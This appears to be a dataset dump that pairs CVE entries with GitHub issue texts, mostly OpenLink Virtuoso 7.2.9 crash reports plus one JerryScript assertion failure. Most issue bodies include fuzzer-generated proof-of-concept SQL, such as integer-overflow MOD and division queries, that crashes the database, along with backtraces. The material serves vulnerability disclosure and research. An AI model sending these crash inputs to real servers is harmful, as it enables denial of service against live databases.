cve_id stringlengths 13 16 | cve_published stringlengths 23 23 | cve_descriptions stringlengths 54 997 | cve_metrics dict | cve_references listlengths 1 68 | cve_configurations listlengths 1 5 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 76
values | url stringlengths 37 79 | cve_tags listlengths 1 4 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 3 88.6k ⌀ | issue_title stringlengths 3 335 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 146 | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 128M 2.84B | issue_number int64 1 128k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2023-31921 | 2023-05-12T14:15:10.007 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5068"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5068 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi... | Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5068/comments | 0 | 2023-04-08T14:19:33Z | 2024-11-22T09:20:07Z | https://github.com/jerryscript-project/jerryscript/issues/5068 | 1,659,537,585 | 5,068 |
CVE-2023-31607 | 2023-05-15T15:15:11.573 | An issue in the __libc_malloc component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1120 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x VARCHAR, k VARCHAR);
CREATE INDEX t1i1 ON t1(c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,c17,c18,c19,c20,c21,c22,c23,c24,c25,c26,c27,c28,c29,c30,c31,c32,c33,c34,c35,c36,c37,c38,c39,c40,c41,c42,c43,c44,c45,c46,c47,c48,c49,c50,c51,c52,c53,c54,... | virtuoso 7.2.9 crashed at __libc_malloc | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1120/comments | 0 | 2023-04-12T18:42:34Z | 2023-04-14T08:12:11Z | https://github.com/openlink/virtuoso-opensource/issues/1120 | 1,665,064,064 | 1,120 |
CVE-2023-31608 | 2023-05-15T15:15:11.623 | An issue in the artm_div_int component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1123"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1123 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT CAST('-9223372036854775808' AS INTEGER) / CAST('-1' AS SMALLINT);
```
backtrace:
```c
#0 0xc227a4 (artm_div_int+0xf4)
#1 0xc23766 (artm_vec+0x7d6)
#2 0x7518c2 (code_vec_run_v+0x10e2)
#3 0x7ac3ff (qn_input+0x38f)
#4 0x7ac8a6 (qn_send_output+0x236)
#5 0x81e... | virtuoso 7.2.9 crashed at artm_div_int | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1123/comments | 0 | 2023-04-12T18:49:08Z | 2023-04-14T08:12:12Z | https://github.com/openlink/virtuoso-opensource/issues/1123 | 1,665,072,694 | 1,123 |
CVE-2023-31609 | 2023-05-15T15:15:11.673 | An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1126"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1126 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE b (
folders VARCHAR(80),
folderid VARCHAR(80),
parentid VARCHAR(80),
rootid VARCHAR(80),
c INTEGER,
path VARCHAR(80),
id VARCHAR(80),
i VARCHAR(80),
d VARCHAR(80),
e VARCHAR(80),
f ... | virtuoso 7.2.9 crashed at dfe_unit_col_loci | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1126/comments | 1 | 2023-04-12T18:58:35Z | 2023-04-17T19:06:54Z | https://github.com/openlink/virtuoso-opensource/issues/1126 | 1,665,085,302 | 1,126 |
CVE-2023-31610 | 2023-05-15T15:15:11.720 | An issue in the _IO_default_xsputn component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1118"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1118 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t2(x VARCHAR, y VARCHAR, c VARCHAR);
CREATE VIEW t2 AS SELECT * FROM t2;
INSERT INTO t2 VALUES(8,8,RDF_SYS.xsd_hexBinary_fromBinary(SYSTEM_BASE64_ENCODE(zeroblob(200))));
```
backtrace:
```c
#0 0x7f87bcd56050 (_IO_default_xsputn+0xa0)
#1 0x7f87bcd3b0f... | virtuoso 7.2.9 crashed at _IO_default_xsputn | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1118/comments | 0 | 2023-04-12T18:33:19Z | 2023-04-14T08:12:10Z | https://github.com/openlink/virtuoso-opensource/issues/1118 | 1,665,051,847 | 1,118 |
CVE-2023-31611 | 2023-05-15T15:15:11.770 | An issue in the __libc_longjmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1119"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1119 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE hist (
cnt VARCHAR NOT NULL,
y VARCHAR NOT NULL,
z VARCHAR,
PRIMARY KEY (cnt,y)
);
CREATE TABLE t19d AS (SELECT * FROM hist UNION ALL SELECT 1234);
```
backtrace:
```c
#0 0x7f523bf87dbe (__libc_longjmp+0xde)
#1 0x5177d573a547bfaf -- no sym... | virtuoso 7.2.9 crashed at __libc_longjmp | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1119/comments | 0 | 2023-04-12T18:38:29Z | 2023-04-14T08:12:10Z | https://github.com/openlink/virtuoso-opensource/issues/1119 | 1,665,059,115 | 1,119 |
CVE-2023-31612 | 2023-05-15T15:15:11.813 | An issue in the dfe_qexp_list component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1125"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1125 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x VARCHAR,
y VARCHAR
);
SELECT IFNULL(MIN(x), -1), IFNULL(MAX(x), -1)
FROM (
SELECT x FROM t1 UNION ALL
SELECT NULL
) AS temp;
```
backtrace:
```c
#0 0x737010 (dfe_qexp_list+0x40)
#1 0x73711d (dfe_qexp_list+0x14d)
#2 0x747... | virtuoso 7.2.9 crashed at dfe_qexp_list | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1125/comments | 1 | 2023-04-12T18:52:59Z | 2023-04-17T19:07:44Z | https://github.com/openlink/virtuoso-opensource/issues/1125 | 1,665,077,173 | 1,125 |
CVE-2023-31613 | 2023-05-15T15:15:11.867 | An issue in the __nss_database_lookup component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1121"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1121 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (c1 INT, c2 BINARY(100),c3 FLOAT);
INSERT INTO t1 VALUES (100,'abcdefghij',3.0);
CREATE TABLE t2 (c1 INT, c2 VARCHAR(100));
INSERT INTO t2 VALUES (2,'abcde');
UPDATE t1 SET c2 = (SELECT MAX(c1) FROM t2);
```
backtrace:
```c
#0 0x7fd63dbe3a7d (__ns... | virtuoso 7.2.9 crashed at __nss_database_lookup | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1121/comments | 0 | 2023-04-12T18:46:15Z | 2023-04-17T09:13:45Z | https://github.com/openlink/virtuoso-opensource/issues/1121 | 1,665,069,177 | 1,121 |
CVE-2023-31614 | 2023-05-15T15:15:11.913 | An issue in the mp_box_deserialize_string function in openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1117 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | ## Description
When running the following statement on an empty virtuoso-opensource database, the database just crashed:
```sql
SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables
UNION
SELECT column_name as name, data_type as type, table_name as parentname FROM informati... | virtuoso *crashed* after running a SELECT statement | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1117/comments | 2 | 2023-04-10T17:55:59Z | 2023-04-17T09:13:46Z | https://github.com/openlink/virtuoso-opensource/issues/1117 | 1,661,128,936 | 1,117 |
CVE-2023-31615 | 2023-05-15T15:15:11.963 | An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1124"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1124 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x INTEGER UNIQUE);
CREATE TABLE k(v varchar(255), excluded varchar(255));
INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0);
SELECT 'one', t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL;
```
backtrace:
```c
#0 0x4257c4 (chas... | virtuoso 7.2.9 crashed at chash_array | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1124/comments | 0 | 2023-04-12T18:50:37Z | 2023-04-14T12:55:18Z | https://github.com/openlink/virtuoso-opensource/issues/1124 | 1,665,074,357 | 1,124 |
CVE-2023-31616 | 2023-05-15T15:15:12.010 | An issue in the bif_mod component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1122"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1122 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT MOD(-9223372036854775808, -1);
```
backtrace:
```c
#0 0x66a32e (bif_mod+0xce)
#1 0x74ae62 (sqlr_run_bif_in_sandbox+0x392)
#2 0x79b598 (sqlp_patch_call_if_special_or_optimizable+0x1148)
#3 0xccffe7 (scn3yyparse+0xc5d7)
#4 0x6b995b (sql_compile_1+0x129b)
#5... | virtuoso 7.2.9 crashed at bif_mod | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1122/comments | 0 | 2023-04-12T18:47:44Z | 2023-04-14T08:12:11Z | https://github.com/openlink/virtuoso-opensource/issues/1122 | 1,665,070,884 | 1,122 |
CVE-2023-31617 | 2023-05-15T15:15:12.057 | An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1127"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1127 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE b (
folders VARCHAR(80),
folderid VARCHAR(80),
parentid VARCHAR(80),
rootid VARCHAR(80),
c INTEGER,
path VARCHAR(80),
id VARCHAR(80),
i VARCHAR(80),
d VARCHAR(80),
e VARCHAR(80),
f ... | virtuoso 7.2.9 crashed at dk_set_delete | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1127/comments | 0 | 2023-04-12T19:01:25Z | 2023-04-14T08:12:12Z | https://github.com/openlink/virtuoso-opensource/issues/1127 | 1,665,089,526 | 1,127 |
CVE-2023-31618 | 2023-05-15T15:15:12.110 | An issue in the sqlc_union_dt_wrap component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1136"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1136 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT SUM(v), COUNT(*) FROM gstest_empty
UNION ALL
SELECT SUM(v), NULL FROM gstest_empty
UNION ALL
SELECT NULL, COUNT(*) FROM gstest_empty
UNION ALL
SELECT NULL, NULL
```
backtrace:
```c
#0 0x81a65e (sqlc_union_dt_wrap+0x5e)
#1 0x81a783 (sqlc_union_order+0x33... | virtuoso 7.2.9 crashed at sqlc_union_dt_wrap | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1136/comments | 0 | 2023-04-12T19:34:10Z | 2023-04-14T08:12:15Z | https://github.com/openlink/virtuoso-opensource/issues/1136 | 1,665,129,009 | 1,136 |
CVE-2023-31619 | 2023-05-15T15:15:12.170 | An issue in the sch_name_to_object component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1133"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1133 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x VARCHAR, k VARCHAR, v VARCHAR);
CREATE VIEW t1 AS SELECT x, x FROM t1;
UPDATE t1 SET x = x + 100;
```
backtrace:
```c
#0 0x6080d1 (sch_name_to_object+0x11)
#1 0x7dcf6f (sqlc_update_searched+0x6f)
#2 0x817cd1 (sqlc_update_view+0xaa1)
#3 0x7ddad0... | virtuoso 7.2.9 crashed at sch_name_to_object | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1133/comments | 1 | 2023-04-12T19:26:23Z | 2023-04-14T08:41:03Z | https://github.com/openlink/virtuoso-opensource/issues/1133 | 1,665,120,116 | 1,133 |
CVE-2023-31620 | 2023-05-15T15:15:12.237 | An issue in the dv_compare component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1128"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1128 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE element (
name VARCHAR(80),
test1 VARCHAR(80),
f1 VARCHAR(80),
f2 VARCHAR(80),
code INTEGER,
t1 VARCHAR(80),
a VARCHAR(80),
example VARCHAR(80),
b VARCHAR(80),
c VARCHAR(80),
folder... | virtuoso 7.2.9 crashed at dv_compare | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1128/comments | 0 | 2023-04-12T19:03:51Z | 2023-04-17T18:53:42Z | https://github.com/openlink/virtuoso-opensource/issues/1128 | 1,665,092,932 | 1,128 |
CVE-2023-31621 | 2023-05-15T15:15:12.300 | An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1130"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
